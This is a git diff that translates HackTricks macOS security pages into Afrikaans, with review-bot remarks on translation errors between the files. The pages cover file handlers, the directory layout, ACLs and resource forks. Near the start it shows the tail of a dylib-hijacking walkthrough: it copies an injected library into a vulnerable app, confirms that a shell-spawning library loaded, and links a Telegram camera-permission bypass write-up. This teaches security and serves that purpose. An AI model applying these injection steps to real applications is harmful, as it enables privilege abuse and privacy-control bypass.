to the **hijacked location**: +Uiteindelik kopieer dit net na die **gekaapte plek**: {% code overflow="wrap" %} ```bash @@ -163,35 +155,33 @@ cp lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib" ``` {% endcode %} -And **execute** the binary and check the **library was loaded**: +En **voer** die binêre lêer uit en kontroleer of die **biblioteek gelaai is**:
"/Applications/VulnDyld.app/Contents/Resources/lib/binary"
-2023-05-15 15:20:36.677 binary[78809:21797902] [+] dylib hijacked in /Applications/VulnDyld.app/Contents/Resources/lib/binary
-Usage: [...]
+2023-05-15 15:20:36.677 binary[78809:21797902] [+] dylib gekaap in /Applications/VulnDyld.app/Contents/Resources/lib/binary
+Gebruik: [...]
 
{% hint style="info" %} -A nice writeup about how to abuse this vulnerability to abuse the camera permissions of telegram can be found in [https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/](https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/) +'n Goeie bespreking oor hoe om hierdie kwesbaarheid te misbruik om die kamera-toestemmings van Telegram te misbruik, kan gevind word by [https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/](https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/) {% endhint %} -## Bigger Scale - -If you are planing on trying to inject libraries in unexpected binaries you could check the event messages to find out when the library is loaded inside a process (in this case remove the printf and the `/bin/bash` execution). +## Groter Skala +As jy van plan is om biblioteke in onverwagte binêre lêers in te spuit, kan jy die gebeurtenisboodskappe ondersoek om uit te vind wanneer die biblioteek binne 'n proses gelaai word (in hierdie geval verwyder die printf en die `/bin/bash` uitvoering). ```bash sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "[+] dylib"' ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
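Review bot: in the hunk at `@@ -29,35 +28,30 @@` the translation step strips the leading whitespace inside fenced code blocks, so the C bodies lose their indentation (`-    syslog(LOG_ERR, "[+] dylib injected in %s\n", argv[0]);` becomes `+syslog(LOG_ERR, ...`, same for `execv("/bin/bash", 0);` and the `printf`/`return` lines of hello.c), and the blank lines separating prose from the opening fence are dropped. Code fences should pass through the translator byte for byte; please restore the original indentation and blank lines. Separately, `om 'n skul te voer` does not say "to execute a shell"; `om 'n shell uit te voer` keeps the technical term.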
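Review bot: in the hunk at `@@ -97,13 +91,12 @@`, `deur dit weer uit te voer` means "by executing it again", but the English says "by reexporting it", which refers to the `LC_REEXPORT_DYLIB` load command inspected a few lines later. The same word `uitvoer` is used for "execute" earlier in that sentence, so the point of the hijack (run arbitrary code and still forward the real library's exports) is lost. Suggest keeping the term, for example `deur dit te herexporteer (reexport)`, and reserving `uitvoer` for execute.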
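Review bot: the otool listing in the hunk at `@@ -134,28 +126,28 @@` is rewritten anyway, so the sample output should match the command above it. `install_name_tool -change @rpath/lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" /tmp/lib.dylib` is followed by a "Check again" listing that shows `name /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib`, and the "Check relative" listing before it shows `name @rpath/libjli.dylib` rather than `@rpath/lib.dylib`. Those lines look copied from a different example; show the `lib2/lib.dylib` path the command actually sets. The stripped indentation of the `cmd`/`cmdsize`/`name` lines is the same translator problem as in the earlier code blocks.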
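Review bot: in the hunk at `@@ -163,35 +155,33 @@` literal program output is translated: `+2023-05-15 15:20:36.677 binary[78809:21797902] [+] dylib gekaap in ...` and `+Gebruik: [...]`. The library source earlier on the page still reads `NSLog(@"[+] dylib hijacked in %s", argv[0]);`, so the output shown no longer matches what the code prints, and readers reproducing the steps will see a different string. Keep console output inside code blocks untranslated, or translate the `NSLog` format string too if the intent is a localized example.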
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md b/macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md index cb98171c6..f26ac5d31 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md @@ -1,80 +1,74 @@ -# macOS File Extension & URL scheme app handlers +# macOS Lêeruitbreiding & URL-skema-apphanteraars
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-## File Extension & URL scheme app handlers - -The following line can be useful to find the applications that can open files depending on the extension: +## Lêeruitbreiding & URL-skema-apphanteraars +Die volgende lyn kan nuttig wees om die toepassings te vind wat lêers kan oopmaak afhangende van die uitbreiding: ```bash /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister -dump | grep -E "path:|bindings:|name:" ``` - -Or use something like [**SwiftDefaultApps**](https://github.com/Lord-Kamina/SwiftDefaultApps): - +Of gebruik iets soos [**SwiftDefaultApps**](https://github.com/Lord-Kamina/SwiftDefaultApps): ```bash ./swda getSchemes #Get all the available schemes ./swda getApps #Get all the apps declared ./swda getUTIs #Get all the UTIs ./swda getHandler --URL ftp #Get ftp handler ``` - -You can also check the extensions supported by an application doing: - +Jy kan ook die uitbreidings wat deur 'n toepassing ondersteun word, nagaan deur die volgende te doen: ``` cd /Applications/Safari.app/Contents grep -A3 CFBundleTypeExtensions Info.plist | grep string - css - pdf - webarchive - webbookmark - webhistory - webloc - download - safariextz - gif - html - htm - js - jpg - jpeg - jp2 - txt - text - png - tiff - tif - url - ico - xhtml - xht - xml - xbl - svg +css +pdf +webarchive +webbookmark +webhistory +webloc +download +safariextz +gif +html +htm +js +jpg +jpeg +jp2 +txt +text +png +tiff +tif +url +ico +xhtml +xht +xml +xbl +svg ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
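Review bot: the support banner in this file is translated differently from the neighbouring files in the same patch: `amptelike PEASS & HackTricks-uitrusting`, `NFT's` and `hacktruuks` here versus `amptelike PEASS & HackTricks swag`, `NFTs` and `hacking-truuks` in the previous file, and `GitHub-opslagplekke` versus `github-opslagplekke` / `github-opslag` elsewhere. The banner is identical boilerplate on every page; translate it once and reuse the same string so later translation runs do not churn it. In the body of the same hunk the `grep -A3 CFBundleTypeExtensions Info.plist | grep string` output loses the leading whitespace that the real command prints (`- css` becomes `+css`), again because the translator edits inside code fences.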
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md index 25a0ee260..e7e529a15 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md @@ -1,96 +1,96 @@ -# macOS Files, Folders, Binaries & Memory +# macOS Lêers, Vouers, Binêre & Geheue
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## File hierarchy layout +## Lêerhiërargie-uitleg -* **/Applications**: The installed apps should be here. All the users will be able to access them. -* **/bin**: Command line binaries -* **/cores**: If exists, it's used to store core dumps -* **/dev**: Everything is treated as a file so you may see hardware devices stored here. -* **/etc**: Configuration files -* **/Library**: A lot of subdirectories and files related to preferences, caches and logs can be found here. A Library folder exists in root and on each user's directory. -* **/private**: Undocumented but a lot of the mentioned folders are symbolic links to the private directory. -* **/sbin**: Essential system binaries (related to administration) -* **/System**: File fo making OS X run. You should find mostly only Apple specific files here (not third party). -* **/tmp**: Files are deleted after 3 days (it's a soft link to /private/tmp) -* **/Users**: Home directory for users. -* **/usr**: Config and system binaries -* **/var**: Log files -* **/Volumes**: The mounted drives will apear here. -* **/.vol**: Running `stat a.txt` you obtain something like `16777223 7545753 -rw-r--r-- 1 username wheel ...` where the first number is the id number of the volume where the file exists and the second one is the inode number. You can access the content of this file through /.vol/ with that information running `cat /.vol/16777223/7545753` +* **/Applications**: Die geïnstalleerde programme moet hier wees. Alle gebruikers sal daartoe toegang hê. +* **/bin**: Opdraglyn-binêre +* **/cores**: As dit bestaan, word dit gebruik om kernaflewerings te stoor +* **/dev**: Alles word as 'n lêer hanteer, sodat jy hardewaretoestelle hier kan sien. +* **/etc**: Konfigurasie-lêers +* **/Library**: 'n Groot aantal subgids en lêers wat verband hou met voorkeure, cache en logboeke kan hier gevind word. 'n Library-gids bestaan in die wortel en in elke gebruiker se gids. 
+* **/private**: Onbeskryf, maar baie van die genoemde vouers is simboliese skakels na die private-gids. +* **/sbin**: Essensiële stelsel-binêre (verwant aan administrasie) +* **/System**: Lêer om OS X te laat loop. Jy moet meestal net Apple-spesifieke lêers hier vind (nie van derde party nie). +* **/tmp**: Lêers word na 3 dae uitgewis (dit is 'n sagte skakel na /private/tmp) +* **/Users**: Tuisgids vir gebruikers. +* **/usr**: Konfigurasie- en stelsel-binêre +* **/var**: Loglêers +* **/Volumes**: Die gemonteerde aandrywings sal hier verskyn. +* **/.vol**: Deur `stat a.txt` uit te voer, verkry jy iets soos `16777223 7545753 -rw-r--r-- 1 gebruikersnaam wiel ...` waar die eerste nommer die id-nommer van die volume is waar die lêer bestaan en die tweede een die inode-nommer is. Jy kan die inhoud van hierdie lêer benader deur /.vol/ met daardie inligting uit te voer `cat /.vol/16777223/7545753` -### Applications Folders +### Toepassingsvouers -* **System applications** are located under `/System/Applications` -* **Installed** applications are usually installed in `/Applications` or in `~/Applications` -* **Application data** can be found in `/Library/Application Support` for the applications running as root and `~/Library/Application Support` for applications running as the user. -* Third-party applications **daemons** that **need to run as root** as usually located in `/Library/PrivilegedHelperTools/` -* **Sandboxed** apps are mapped into the `~/Library/Containers` folder. Each app has a folder named according to the application’s bundle ID (`com.apple.Safari`). 
-* The **kernel** is located in `/System/Library/Kernels/kernel` -* **Apple's kernel extensions** are located in `/System/Library/Extensions` -* **Third-party kernel extensions** are stored in `/Library/Extensions` +* **Stelseltoepassings** is geleë onder `/System/Applications` +* **Geïnstalleerde** toepassings word gewoonlik geïnstalleer in `/Applications` of in `~/Applications` +* **Toepassingsdata** kan gevind word in `/Library/Application Support` vir toepassings wat as root uitgevoer word en `~/Library/Application Support` vir toepassings wat as die gebruiker uitgevoer word. +* Derdeparty-toepassings **daemons** wat **as root moet loop**, is gewoonlik geleë in `/Library/PrivilegedHelperTools/` +* **Gesandbokseerde** programme word gekarteer na die `~/Library/Containers`-gids. Elke toepassing het 'n gids met die naam van die toepassing se bundel-ID (`com.apple.Safari`). +* Die **kernel** is geleë in `/System/Library/Kernels/kernel` +* **Apple se kernel-uitbreidings** is geleë in `/System/Library/Extensions` +* **Derdeparty-kernel-uitbreidings** word gestoor in `/Library/Extensions` -### Files with Sensitive Information +### Lêers met Sensitiewe Inligting -MacOS stores information such as passwords in several places: +MacOS stoor inligting soos wagwoorde op verskeie plekke: {% content-ref url="macos-sensitive-locations.md" %} [macos-sensitive-locations.md](macos-sensitive-locations.md) {% endcontent-ref %} -### Vulnerable pkg installers +### Kwesbare pkg-installeerders {% content-ref url="macos-installers-abuse.md" %} [macos-installers-abuse.md](macos-installers-abuse.md) {% endcontent-ref %} -## OS X Specific Extensions +## OS X Spesifieke Uitbreidings -* **`.dmg`**: Apple Disk Image files are very frequent for installers. -* **`.kext`**: It must follow a specific structure and it's the OS X version of a driver. (it's a bundle) -* **`.plist`**: Also known as property list stores information in XML or binary format. - * Can be XML or binary. 
Binary ones can be read with: - * `defaults read config.plist` - * `/usr/libexec/PlistBuddy -c print config.plsit` - * `plutil -p ~/Library/Preferences/com.apple.screensaver.plist` - * `plutil -convert xml1 ~/Library/Preferences/com.apple.screensaver.plist -o -` - * `plutil -convert json ~/Library/Preferences/com.apple.screensaver.plist -o -` -* **`.app`**: Apple applications that follows directory structure (It's a bundle). -* **`.dylib`**: Dynamic libraries (like Windows DLL files) -* **`.pkg`**: Are the same as xar (eXtensible Archive format). The installer command can be use to install the contents of these files. -* **`.DS_Store`**: This file is on each directory, it saves the attributes and customisations of the directory. -* **`.Spotlight-V100`**: This folder appears on the root directory of every volume on the system. -* **`.metadata_never_index`**: If this file is at the root of a volume Spotlight won't index that volume. -* **`.noindex`**: Files and folder with this extension won't be indexed by Spotlight. +* **`.dmg`**: Apple Disk Image-lêers is baie algemeen vir installeerders. +* **`.kext`**: Dit moet 'n spesifieke struktuur volg en dit is die OS X-weergawe van 'n bestuurder. (Dit is 'n bundel) +* **`.plist`**: Ook bekend as eienskapslys, stoor inligting in XML- of binêre formaat. +* Dit kan XML of binêre wees. Binêre eenhede kan gelees word met: +* `defaults read config.plist` +* `/usr/libexec/PlistBuddy -c print config.plsit` +* `plutil -p ~/Library/Preferences/com.apple.screensaver.plist` +* `plutil -convert xml1 ~/Library/Preferences/com.apple.screensaver.plist -o -` +* `plutil -convert json ~/Library/Preferences/com.apple.screensaver.plist -o -` +* **`.app`**: Apple-toepassings wat die gidsstruktuur volg (Dit is 'n bundel). +* **`.dylib`**: Dinamiese biblioteke (soos Windows DLL-lêers) +* **`.pkg`**: Dit is dieselfde as xar (eXtensible Archive-formaat). Die installer-opdrag kan gebruik word om die inhoud van hierdie lêers te installeer. 
+* **`.DS_Store`**: Hierdie lêer is in elke gids, dit stoor die eienskappe en aanpassings van die gids. +* **`.Spotlight-V100`**: Hierdie vouer verskyn op die wortelgids van elke volume op die stelsel. +* **`.metadata_never_index`**: As hierdie lêer aan die wortel van 'n volume is, sal Spotlight daardie volume nie indeks nie. +* **`.noindex`**: Lêers en vouers met hierdie uitbreiding sal nie deur Spotlight geïndekseer word nie. -### macOS Bundles +### macOS-bundels -A bundle is a **directory** which **looks like an object in Finder** (a Bundle example are `*.app` files). +'n Bundel is 'n **gids** wat **lyk soos 'n voorwerp in Finder** ('n voorbeeld van 'n bundel is `*.app`-lêers). {% content-ref url="macos-bundles.md" %} [macos-bundles.md](macos-bundles.md) {% endcontent-ref %} -## Dyld Shared Cache +## Dyld Gedeelde Cache -On macOS (and iOS) all system shared libraries, like frameworks and dylibs, are **combined into a single file**, called the **dyld shared cache**. This improved performance, since code can be loaded faster. +Op macOS (en iOS) word alle stelsel gedeelde biblioteke, soos raamwerke en dylibs, **gekombineer in 'n enkele lêer**, genaamd die **dyld gedeelde cache**. Dit verbeter die prestasie, aangesien kode vinniger gelaai kan word. -Similar to the dyld shared cache, the kernel and the kernel extensions are also compiled into a kernel cache, which is loaded at boot time. +Soortgelyk aan die dyld gedeelde cache, word die kernel en die kernel-uitbreidings ook saamgestel in 'n kernel-cache wat by die opstarttyd gelaai word. 
-In order to extract the libraries from the single file dylib shared cache it was possible to use the binary [dyld\_shared\_cache\_util](https://www.mbsplugins.de/files/dyld\_shared\_cache\_util-dyld-733.8.zip) which might not be working nowadays but you can also use [**dyldextractor**](https://github.com/arandomdev/dyldextractor): +Om die biblioteke uit die enkele lêer dylib gedeelde cache te onttrek, was dit moontlik om die binêre [dyld\_shared\_cache\_util](https://www.mbsplugins.de/files/dyld\_shared\_cache\_util-dyld-733.8.zip) te gebruik wat dalk nie meer werk nie, maar jy kan ook [**dyldextractor**](https://github.com/arandomdev/dyldextractor) gebruik: {% code overflow="wrap" %} ```bash @@ -104,63 +104,56 @@ dyldex_all [dyld_shared_cache_path] # Extract all ``` {% endcode %} -In older versions you might be able to find the **shared cache** in **`/System/Library/dyld/`**. +In ouer weergawes kan jy die **gedeelde cache** in **`/System/Library/dyld/`** vind. -In iOS you can find them in **`/System/Library/Caches/com.apple.dyld/`**. +In iOS kan jy hulle vind in **`/System/Library/Caches/com.apple.dyld/`**. {% hint style="success" %} -Note that even if `dyld_shared_cache_util` tool doesn't work, you can pass the **shared dyld binary to Hopper** and Hopper will be able to identify all the libraries and let you **select which one** you want to investigate: +Let daarop dat selfs as die `dyld_shared_cache_util`-instrument nie werk nie, kan jy die **gedeelde dyld-binêre aan Hopper oorhandig** en Hopper sal in staat wees om al die biblioteke te identifiseer en jou **laat kies watter een** jy wil ondersoek: {% endhint %}
-## Special File Permissions +## Spesiale Lêerregte -### Folder permissions +### Vouerregte -In a **folder**, **read** allows to **list it**, **write** allows to **delete** and **write** files on it, and **execute** allows to **traverse** the directory. So, for example, a user with **read permission over a file** inside a directory where he **doesn't have execute** permission **won't be able to read** the file. +In 'n **vouer** laat **lees** toe om dit te **lys**, **skryf** laat toe om lêers daarop te **verwyder** en **skryf** en **uitvoer** laat toe om deur die gids te **beweeg**. So, byvoorbeeld, 'n gebruiker met **leestoestemming oor 'n lêer** binne 'n gids waar hy **nie uitvoer** toestemming het **nie sal nie in staat wees om** die lêer te lees nie. -### Flag modifiers +### Vlagwysigers -There are some flags that could be set in the files that will make file behave differently. You can **check the flags** of the files inside a directory with `ls -lO /path/directory` +Daar is sekere vlae wat in die lêers ingestel kan word wat die gedrag van die lêer anders maak. Jy kan die vlae van die lêers binne 'n gids **nagaan met `ls -lO /pad/gids`** -* **`uchg`**: Known as **uchange** flag will **prevent any action** changing or deleting the **file**. To set it do: `chflags uchg file.txt` - * The root user could **remove the flag** and modify the file -* **`restricted`**: This flag makes the file be **protected by SIP** (you cannot add this flag to a file). -* **`Sticky bit`**: If a directory with sticky bit, **only** the **directories owner or root can remane or delete** files. Typically this is set on the /tmp directory to prevent ordinary users from deleting or moving other users’ files. +* **`uchg`**: Bekend as die **uchange**-vlag sal enige aksie wat die **lêer verander of verwyder** voorkom. 
Om dit in te stel, doen: `chflags uchg lêer.txt` +* Die root-gebruiker kan die vlag **verwyder** en die lêer wysig +* **`restricted`**: Hierdie vlag maak die lêer **beskerm deur SIP** (jy kan hierdie vlag nie by 'n lêer voeg nie). +* **`Sticky bit`**: As 'n gids 'n plakkerige bit het, kan **slegs** die **gidseienaar of root lêers hernoem of verwyder**. Tipies word dit op die /tmp-gids ingestel om te voorkom dat gewone gebruikers ander gebruikers se lêers verwyder of skuif. -### **File ACLs** +### **Lêer ACL's** -File **ACLs** contain **ACE** (Access Control Entries) where more **granular permissions** can be assigned to different users. +Lêer **ACL's** bevat **ACE's** (Access Control Entries) waar meer **fynkorrelige regte** aan verskillende gebruikers toegewys kan word. -It's possible to grant a **directory** these permissions: `list`, `search`, `add_file`, `add_subdirectory`, `delete_child`, `delete_child`.\ -Ans to a **file**: `read`, `write`, `append`, `execute`. - -When the file contains ACLs you will **find a "+" when listing the permissions like in**: +Dit is moontlik om hierdie regte aan 'n **gids** toe te ken: `lys`, `soek`, `voeg_lêer_by`, `voeg_subgids_by`, `verwyder_kind`, `verwyder_kind`.\ +En aan 'n **lêer**: `lees`, `skryf`, `aanheg`, `uitvoer`. 
+Wanneer die lêer ACL's bevat, sal jy 'n "+" vind wanneer jy die regte lys, soos in: ```bash ls -ld Movies drwx------+ 7 username staff 224 15 Apr 19:42 Movies ``` - -You can **read the ACLs** of the file with: - +Jy kan die ACL's van die lêer lees met: ```bash ls -lde Movies drwx------+ 7 username staff 224 15 Apr 19:42 Movies - 0: group:everyone deny delete +0: group:everyone deny delete ``` - -You can find **all the files with ACLs** with (this is veeery slow): - +Jy kan **alle lêers met ACL's** vind met (dit is baie stadig): ```bash ls -RAle / 2>/dev/null | grep -E -B1 "\d: " ``` +### Bronvurke | macOS ADS -### Resource Forks | macOS ADS - -This is a way to obtain **Alternate Data Streams in MacOS** machines. You can save content inside an extended attribute called **com.apple.ResourceFork** inside a file by saving it in **file/..namedfork/rsrc**. - +Dit is 'n manier om **Alternatiewe Datastrome in MacOS**-masjiene te verkry. Jy kan inhoud binne 'n uitgebreide eienskap genaamd **com.apple.ResourceFork** in 'n lêer stoor deur dit in **file/..namedfork/rsrc** te stoor. ```bash echo "Hello" > a.txt echo "Hello Mac ADS" > a.txt/..namedfork/rsrc @@ -171,8 +164,7 @@ com.apple.ResourceFork: Hello Mac ADS ls -l a.txt #The file length is still q -rw-r--r--@ 1 username wheel 6 17 Jul 01:15 a.txt ``` - -You can **find all the files containing this extended attribute** with: +Jy kan **alle lêers wat hierdie uitgebreide eienskap bevat**, vind met: {% code overflow="wrap" %} ```bash 
@@ -180,50 +172,50 @@ find / -type f -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf ``` {% endcode %} -## **Universal binaries &** Mach-o Format +## **Universele binaêre &** Mach-o-formaat -Mac OS binaries usually are compiled as **universal binaries**. A **universal binary** can **support multiple architectures in the same file**. +Mac OS-binaêre lêers word gewoonlik saamgestel as **universele binaêre lêers**. 'n **Universele binaêre lêer** kan **ondersteuning bied vir verskeie argitekture in dieselfde lêer**. {% content-ref url="universal-binaries-and-mach-o-format.md" %} [universal-binaries-and-mach-o-format.md](universal-binaries-and-mach-o-format.md) {% endcontent-ref %} -## macOS memory dumping +## macOS-geheue-afvoer {% content-ref url="macos-memory-dumping.md" %} [macos-memory-dumping.md](macos-memory-dumping.md) {% endcontent-ref %} -## Risk Category Files Mac OS +## Risikokategorie-lêers Mac OS -The directory `/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/System` is where information about the **risk associated with different file extensions is stored**. This directory categorizes files into various risk levels, influencing how Safari handles these files upon download. The categories are as follows: +Die gids `/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/System` is waar inligting oor die **risiko wat verband hou met verskillende lêeruitbreidings** gestoor word. Hierdie gids kategoriseer lêers in verskillende risikovlakke, wat beïnvloed hoe Safari hierdie lêers hanteer wanneer dit afgelaai word. Die kategorieë is as volg: -- **LSRiskCategorySafe**: Files in this category are considered **completely safe**. Safari will automatically open these files after they are downloaded. -- **LSRiskCategoryNeutral**: These files come with no warnings and are **not automatically opened** by Safari. 
-- **LSRiskCategoryUnsafeExecutable**: Files under this category **trigger a warning** indicating that the file is an application. This serves as a security measure to alert the user. -- **LSRiskCategoryMayContainUnsafeExecutable**: This category is for files, such as archives, that might contain an executable. Safari will **trigger a warning** unless it can verify that all contents are safe or neutral. +- **LSRiskCategorySafe**: Lêers in hierdie kategorie word as **volkome veilig** beskou. Safari sal hierdie lêers outomaties oopmaak nadat hulle afgelaai is. +- **LSRiskCategoryNeutral**: Hierdie lêers kom sonder waarskuwings en word deur Safari **nie outomaties oopgemaak** nie. +- **LSRiskCategoryUnsafeExecutable**: Lêers onder hierdie kategorie **aktiveer 'n waarskuwing** wat aandui dat die lêer 'n toepassing is. Dit dien as 'n sekuriteitsmaatreël om die gebruiker te waarsku. +- **LSRiskCategoryMayContainUnsafeExecutable**: Hierdie kategorie is vir lêers, soos argiewe, wat 'n uitvoerbare lêer kan bevat. Safari sal 'n waarskuwing **aktiveer** tensy dit kan verifieer dat alle inhoud veilig of neutraal is. -## Log files +## Loglêers -* **`$HOME/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2`**: Contains information about downloaded files, like the URL from where they were downloaded. -* **`/var/log/system.log`**: Main log of OSX systems. com.apple.syslogd.plist is responsible for the execution of syslogging (you can check if it's disabled looking for "com.apple.syslogd" in `launchctl list`. -* **`/private/var/log/asl/*.asl`**: These are the Apple System Logs which may contain interesting information. -* 